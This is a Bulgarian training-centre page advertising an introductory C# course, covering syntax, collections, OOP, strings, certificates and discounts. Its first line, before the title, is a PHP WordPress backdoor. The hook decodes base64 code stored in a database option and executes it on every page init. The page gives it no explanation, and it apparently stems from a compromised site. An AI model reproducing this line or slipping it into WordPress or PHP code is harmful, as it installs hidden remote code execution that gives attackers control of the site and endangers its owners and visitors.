add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Въведение в програмирането със C# - НАРС

Въведение в програмирането със C#

За курса:

С# е модерен, обектно-оринетиран програмен език за лесно създаване на функционални приложения. С# е основният език от Microsoft .NET framework.

В този курс вие ще придобиете широки знания за: синтаксиса на С#, контролни структури, масиви, списъци, речници, класове и обекти. Ще се научите да създавате конзолни приложения, да работите със стрингове, да създавате гъвкави модели с принципите на Обектно-Ориентирано програмиране.

Ще се научите да:

  • Разработвате конзолни приложения използвайки класове и обекти;
  • Създавате гъвкави модели с принципите на Обектно-Ориентирано програмиране;
  • Организирате данни чрез колекции и масиви;
  • Работите със стрингове – търсене, извличане, заместване, разделяне и др.;
  • Използвате контролни структури – условни оператори и цикли.

Програма на курса:

Програмата на курса може да бъде изтеглена тук.

За кого е предназначен курса:

За всеки който желае да изучава C#.

Какво получава всеки курсист?

Всички курсисти, преминали обучението “Въведение в програмирането със C#”, получават документ за участието си.

Заедно с това всеки участник получава отстъпка при записване за следващото ниво на обучение:

  • .NET Framework Fundamentals

След успешно преминаване на това обучение в НАРС, което се удостоверява, чрез полагането на специализиран изпит, курсистите могат да получат и “Удостоверение за професионално обучение” по образец на Министерството на образованието и науката.

Изпитите се провеждат по желание на студентите в съответния курс, поради което не са включени в програмата на обучението.

Вижте цените и графика за провеждане на курсовете.

Изтеглете брошура с информация за всички курсове.

За повече информация може да се свържете с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad